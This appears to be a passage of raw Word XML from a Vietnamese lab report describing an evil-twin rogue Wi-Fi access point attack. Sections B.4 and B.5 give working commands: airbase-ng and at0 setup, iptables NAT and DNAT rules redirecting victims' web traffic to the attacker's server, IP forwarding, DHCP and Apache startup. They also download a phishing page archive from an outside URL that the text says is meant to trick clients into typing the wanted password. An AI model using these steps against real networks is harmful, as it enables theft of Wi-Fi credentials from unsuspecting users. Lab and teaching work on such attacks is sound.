    <w:p w14:paraId="1CE52B28" w14:textId="2CE8949B" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="415CDF66" wp14:editId="22F31184">
            <wp:extent cx="3981450" cy="108585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D7C5" w14:textId="77777777" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00EA2CAF">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7ABB3BDF" w14:textId="1DE37334" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65199">
        <w:t>4. Mặc định airbase-ng sẽ tạo một interface at0 để bridge luồng traffic thông qua rogue access point, sử dụng lệnh ifconfig at0 để xem.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C744C5" w14:textId="34A056FF" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7B25AA37" wp14:editId="6EFFEF06">
            <wp:extent cx="4457700" cy="1190625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43D7" w14:textId="74C59743" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B48DFC5" w14:textId="2618037C" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="024A7B2D" w14:textId="6DDEB82C" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65199">
        <w:lastRenderedPageBreak/>
        <w:t>5. Tiến hành phân bổ địa chỉ IP và Subnet Mask cho cổng at0 và định tuy</w:t>
      </w:r>
      <w:r>
        <w:t>ế</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65199">
        <w:t>n.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="144C5E6F" w14:textId="1E92EE7F" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="21A76B3E" wp14:editId="2EC9E864">
            <wp:extent cx="4829175" cy="838200"/>
            <wp:effectExtent l="0" t="0" r="952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325E" w14:textId="33636126" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="796093C0" wp14:editId="09112922">
            <wp:extent cx="4724400" cy="110490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BE28" w14:textId="726F0369" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>gw là ip của card mạng mà không vào monitor mode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E2C915" w14:textId="1D641F23" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65199">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ifconfig</w:t>
      </w:r>
      <w:r>
        <w:t>)- để xem ip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="250B46BA" w14:textId="3CA50C36" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22D247C4" w14:textId="50912437" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65199">
        <w:t xml:space="preserve">6. Xem thông tin định tuyến </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B273D47" w14:textId="057BCDBD" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38870947" wp14:editId="2F7BC51B">
            <wp:extent cx="4943475" cy="904875"/>
            <wp:effectExtent l="0" t="0" r="9525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D42" w14:textId="34BB1A16" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E490F1" w14:textId="389463FB" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A65199">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>B.4 Thiết lập Rule cho firewall</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCC73F1" w14:textId="05E63543" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:ind w:left="927" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65199">
        <w:t>1. C</w:t>
      </w:r>
      <w:r>
        <w:t>ấ</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65199">
        <w:t xml:space="preserve">u hı̀nh cho phép client khi </w:t>
      </w:r>
      <w:r>
        <w:t>kết nối</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65199">
        <w:t xml:space="preserve"> access point giả có</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65199">
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">ể </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65199">
        <w:t>ra mạng internet:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6290CE98" w14:textId="44810BA8" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1191"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc82987686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C15AE" wp14:editId="3D1E6960">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>581660</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>40005</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5359400" cy="2127250"/>
                <wp:effectExtent l="0" t="0" r="1270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212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35210" w14:textId="0F7B0403" w:rsidR="00A65199" w:rsidRPr="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199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UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"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65199">
                              <w:rPr>
                                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"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iptables --table nat --append POSTROUTING --out-interface </w:t>
                            </w:r>
                            <w:r w:rsidR="008D5303" w:rsidRPr="008D5303">
                              <w:rPr>
                                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                                <w:bCs/>
                                <w:i/>
                                <w:i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wlan0</w:t>
                            </w:r>
                            <w:r w:rsidRPr="00A65199">
                              <w:rPr>
                                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"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 -j MASQUERADE</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="769FEE86" w14:textId="77777777" w:rsidR="00A65199" w:rsidRPr="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199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UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"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65199">
                              <w:rPr>
                                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                                <w:bCs/>
                                <w:color w:val="auto"/>
                                <w:sz w:val="26"/>
                                <w:szCs w:val="26"/>
                              </w:rPr>
                              <w:t>iptables --append FORWARD --in-interface at0 -j ACCEPT</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="567990F8" w14:textId="18B627B8" w:rsidR="008D5303" w:rsidRPr="008D5303" w:rsidRDefault="00A65199" w:rsidP="008D5303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UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                                <w:bCs/>
                                <w:i/>
                                <w:i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65199">
                              <w:rPr>
                                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                                <w:bCs/>
                                <w:color w:val="auto"/>
                                <w:sz w:val="26"/>
                                <w:szCs w:val="26"/>
                              </w:rPr>
                              <w:t>iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination</w:t>
                            </w:r>
                            <w:r w:rsidR="008D5303">
                              <w:rPr>
                                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"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D5303" w:rsidRPr="008D5303">
                              <w:rPr>
                                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                                <w:bCs/>
                                <w:i/>
                                <w:i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10.45.170.37:80</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="27A3AF94" w14:textId="7D558FC6" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199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UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"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65199">
                              <w:rPr>
                                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                                <w:bCs/>
                                <w:color w:val="auto"/>
                                <w:sz w:val="26"/>
                                <w:szCs w:val="26"/>
                              </w:rPr>
                              <w:t>iptables -t nat -A POSTROUTING -j MASQUERADE</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="7A12F9A3" w14:textId="77777777" w:rsidR="00A65199" w:rsidRDefault="00A65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15AE" id="Text Box 21" o:spid="_x0000_s1029" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:45.8pt;margin-top:3.15pt;width:422pt;height:16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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="29F35210" w14:textId="0F7B0403" w:rsidR="00A65199" w:rsidRPr="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199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UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                          <w:bCs/>
                          <w:color w:val="auto"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A65199">
                        <w:rPr>
                          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                          <w:bCs/>
                          <w:color w:val="auto"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                        </w:rPr>
                        <w:t xml:space="preserve">iptables --table nat --append POSTROUTING --out-interface </w:t>
                      </w:r>
                      <w:r w:rsidR="008D5303" w:rsidRPr="008D5303">
                        <w:rPr>
                          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="auto"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t>wlan0</w:t>
                      </w:r>
                      <w:r w:rsidRPr="00A65199">
                        <w:rPr>
                          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                          <w:bCs/>
                          <w:color w:val="auto"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                        </w:rPr>
                        <w:t xml:space="preserve"> -j MASQUERADE</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="769FEE86" w14:textId="77777777" w:rsidR="00A65199" w:rsidRPr="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199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UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                          <w:bCs/>
                          <w:color w:val="auto"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A65199">
                        <w:rPr>
                          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                          <w:bCs/>
                          <w:color w:val="auto"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                        </w:rPr>
                        <w:t>iptables --append FORWARD --in-interface at0 -j ACCEPT</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="567990F8" w14:textId="18B627B8" w:rsidR="008D5303" w:rsidRPr="008D5303" w:rsidRDefault="00A65199" w:rsidP="008D5303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UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="auto"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                          <w:u w:val="single"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A65199">
                        <w:rPr>
                          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                          <w:bCs/>
                          <w:color w:val="auto"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                        </w:rPr>
                        <w:t>iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination</w:t>
                      </w:r>
                      <w:r w:rsidR="008D5303">
                        <w:rPr>
                          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                          <w:bCs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8D5303" w:rsidRPr="008D5303">
                        <w:rPr>
                          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                          <w:bCs/>
                          <w:i/>
                          <w:iCs/>
                          <w:color w:val="auto"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                          <w:u w:val="single"/>
                        </w:rPr>
                        <w:t>10.45.170.37:80</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="27A3AF94" w14:textId="7D558FC6" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199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UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                          <w:bCs/>
                          <w:color w:val="auto"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00A65199">
                        <w:rPr>
                          <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach" w:cs="Times New Roman"/>
                          <w:bCs/>
                          <w:color w:val="auto"/>
                          <w:sz w:val="26"/>
                          <w:szCs w:val="26"/>
                        </w:rPr>
                        <w:t>iptables -t nat -A POSTROUTING -j MASQUERADE</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="7A12F9A3" w14:textId="77777777" w:rsidR="00A65199" w:rsidRDefault="00A65199"/>
                  </w:txbxContent>
                </v:textbox>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF8DD40" w14:textId="32F57567" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1191"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D724E37" w14:textId="0682E15B" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1191"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="42454022" w14:textId="688F5B9F" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1191"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5072FCB0" w14:textId="25A902F3" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="1191"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE2F2BA" w14:textId="2086AA3B" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199"/>
    <w:p w14:paraId="693D590C" w14:textId="718E035D" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199"/>
    <w:p w14:paraId="7023F71A" w14:textId="1F1E8900" w:rsidR="00A65199" w:rsidRDefault="00A65199" w:rsidP="00A65199"/>
    <w:p w14:paraId="717A7F97" w14:textId="61F4769B" w:rsidR="008D5303" w:rsidRDefault="008D5303" w:rsidP="00A65199">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="52FBD04D" wp14:editId="2172FDB4">
            <wp:extent cx="6048375" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="9525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13B6" w14:textId="54A302D0" w:rsidR="008D5303" w:rsidRDefault="008D5303" w:rsidP="00A65199">
      <w:r w:rsidRPr="008D5303">
        <w:lastRenderedPageBreak/>
        <w:t>2. Kích hoạt forwarding.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAFC0AE" w14:textId="76DA9B89" w:rsidR="008D5303" w:rsidRPr="008D5303" w:rsidRDefault="008D5303" w:rsidP="00A65199">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>echo 1 &gt; /proc/sys/net/ipv4/ip_forward</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BD01A5" w14:textId="0964DE5D" w:rsidR="00A65199" w:rsidRDefault="008D5303" w:rsidP="00A65199">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6F2525BF" wp14:editId="7F260C04">
            <wp:extent cx="2952750" cy="381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54F2" w14:textId="63CECCD6" w:rsidR="008D5303" w:rsidRDefault="008D5303" w:rsidP="00A65199"/>
    <w:p w14:paraId="0F951093" w14:textId="25ACE855" w:rsidR="008D5303" w:rsidRDefault="008D5303" w:rsidP="00A65199">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>B.5 Khởi động các dịch vụ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7559D666" w14:textId="48501EBD" w:rsidR="008D5303" w:rsidRDefault="008D5303" w:rsidP="00A65199">
      <w:r w:rsidRPr="008D5303">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Nhằm</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5303">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>cấp</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5303">
        <w:t xml:space="preserve"> phát địa chı̉</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="008D5303">
        <w:t xml:space="preserve">cho client khi </w:t>
      </w:r>
      <w:r>
        <w:t>kết</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5303">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>nối</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5303">
        <w:t xml:space="preserve"> vào access point giả</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B826BB" w14:textId="57B00ED3" w:rsidR="008D5303" w:rsidRDefault="008D5303" w:rsidP="00A65199">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>dhcpd -cf /etc/dhcp/dhcpd.conf -pf /var/run/dhclient-eth0.pid at0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1835A63F" w14:textId="7FA36514" w:rsidR="008D5303" w:rsidRDefault="008D5303" w:rsidP="00A65199">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3FF5EAE8" wp14:editId="58418D76">
            <wp:extent cx="4629150" cy="2333625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B9D6" w14:textId="77777777" w:rsidR="008D5303" w:rsidRDefault="008D5303" w:rsidP="00A65199">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BDC2AD7" w14:textId="6D93F4D6" w:rsidR="008D5303" w:rsidRDefault="008D5303" w:rsidP="00A65199">
      <w:r w:rsidRPr="008D5303">
        <w:t>2. Khởi động các dịch vụ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524B1F67" w14:textId="77777777" w:rsidR="008D5303" w:rsidRPr="008D5303" w:rsidRDefault="008D5303" w:rsidP="008D5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>service isc-dhcp-server start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27009746" w14:textId="77777777" w:rsidR="008D5303" w:rsidRPr="008D5303" w:rsidRDefault="008D5303" w:rsidP="008D5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/etc/init.d/apache2 start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60249C3E" w14:textId="3FC1F80F" w:rsidR="008D5303" w:rsidRDefault="008D5303" w:rsidP="008D5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008D5303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>/etc/init.d/m</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ariadb</w:t>
      </w:r>
      <w:r w:rsidRPr="008D5303">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5622E8" w14:textId="6AD12744" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="008D5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="684A1DC2" wp14:editId="7E649AA0">
            <wp:extent cx="3714750" cy="142875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3D1B" w14:textId="40213A1B" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="008D5303">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55BEFD0B" w14:textId="08EF3545" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00684D0A">
        <w:t>3. Tiến hành tải source trang web để lừa client kết nối, client có thể sẽ nhập password mà ta cần vào web này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BDB52F5" w14:textId="232ADD77" w:rsidR="00684D0A" w:rsidRDefault="007F0987" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId24" w:history="1">
        <w:r w:rsidR="00684D0A" w:rsidRPr="00B06611">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://cdn.rootsh3ll.com/u/20180724181033/Rogue_AP.zip</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E7EDA06" w14:textId="237EF013" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="57CCBED9" w14:textId="64C282A4" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="151AB86E" w14:textId="3D220830" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5DA0E411" w14:textId="297285D5" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
      </w:pPr>
      <w:r w:rsidRPr="00684D0A">
        <w:lastRenderedPageBreak/>
        <w:t>4. unzip vào n</w:t>
      </w:r>
      <w:r w:rsidRPr="00684D0A">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ơ</w:t>
      </w:r>
      <w:r w:rsidRPr="00684D0A">
        <w:t>i web server sẽlaÜy trang web với lệnh.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298512C6" w14:textId="33EC4B29" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00684D0A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>unzip rogue_AP.zip -d /var/www/html/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B0C3831" w14:textId="6E12752D" w:rsidR="00684D0A" w:rsidRDefault="00684D0A" w:rsidP="00684D0A">
      <w:pPr>
        <w:ind w:left="567" w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
